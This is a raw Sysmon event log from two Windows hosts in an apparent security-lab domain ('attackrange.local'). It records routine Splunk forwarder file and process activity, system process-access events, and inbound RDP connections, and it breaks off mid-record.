09:14:42.176{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD66735037F28F9E48CCF876E44E664E,SHA256=63342FF8677A9D8860536DA58D647F5705CE8F1C0C37962E83431A39A56D8DD2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979440Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:39.944{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-49248-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979443Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:43.928{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96B70DAED75F04C40FF7040E7B345504,SHA256=5537A84A4A1F94A5F12318F288C5650D0934C6EAA8C9225FCD5150F08C7C282C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050716Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:43.273{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74BD636F2CEB3E4DA91E0EC04D36BED3,SHA256=5C2CF91E2FEA41D371BE2515D82EA5A9B6E983DC5BC9E17F5062A7F5136E5240,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050729Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:44.871{5EBD8912-8B84-6151-477A-00000000FC01}10365136C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001050728Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:42.453{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60518-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001050727Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:44.693{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8B84-6151-477A-00000000FC01}1036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050726Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:44.692{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050725Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:44.692{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050724Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:44.692{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050723Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:44.692{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050722Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:44.692{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8B84-6151-477A-00000000FC01}1036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050721Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:44.691{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8B84-6151-477A-00000000FC01}1036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050720Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:44.656{5EBD8912-8B84-6151-477A-00000000FC01}1036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050719Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:44.571{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4968226A15D185B42701669EDD3A419C,SHA256=80158E4BA9627DCA36980C67FCCAB87369367D68B8AF2C36614D182B4F9BC57D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050718Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:44.571{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2561F44C6DF18E5FD7493036B0F09390,SHA256=E36D6CF9DD2B499AEBCE56D8BDCE0D1093F96663FE29055C9920DF22F1DF0249,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050717Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:44.309{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=741EE6B259049CC59C3AACEA993FDAB1,SHA256=8C0FE26BA83838C3BBE141DDCCC4DE17D53B0EEC170310B7076B10AF2DA09C90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979444Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:44.334{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC76E60581BFC8788D5EFF9F5AE8C8EB,SHA256=63C0D69E83188CA23E082BD86367F6E8F6E758E2F6AC2E35D4792F90326319AB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979446Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:41.557{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.3.202.198-64404-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979445Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:45.022{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E02F974E61EC8C4A706784FFE7D130EE,SHA256=005D478569FC286BCAB2227CE4E5F1DAB224E87B7531274C699CB55B89F867C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050739Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:45.671{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4968226A15D185B42701669EDD3A419C,SHA256=80158E4BA9627DCA36980C67FCCAB87369367D68B8AF2C36614D182B4F9BC57D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050738Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:45.393{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8B85-6151-487A-00000000FC01}5960C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050737Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:45.393{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050736Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:45.393{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050735Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:45.393{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050734Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:45.393{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050733Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:45.393{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8B85-6151-487A-00000000FC01}5960C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050732Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:45.393{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8B85-6151-487A-00000000FC01}5960C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050731Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:45.371{5EBD8912-8B85-6151-487A-00000000FC01}5960C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050730Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:45.355{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1E7E417A8E7CA61DD8313EB8386113A,SHA256=4106036530C65D0786BD294A797CEED30F077FFF050541E5F08AAF7D3346A9D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979447Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:46.256{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECE09BD7F5DFA8B3CA3A6D8D94196C3F,SHA256=26ED1C9269F68C1A5D12021DB1457039A3476C554D68A6C5F5B7B812C22F45D8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050749Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:44.971{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-53509-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050748Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:46.370{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=553D78C2A1D9DEF413D119CAC0EC90D6,SHA256=F6251A3CF831E1EC4D3BA8D456C8F072EEE6CBCB909396550EA13846B4A71836,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050747Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:46.091{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8B86-6151-497A-00000000FC01}5324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050746Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:46.089{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050745Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:46.089{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050744Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 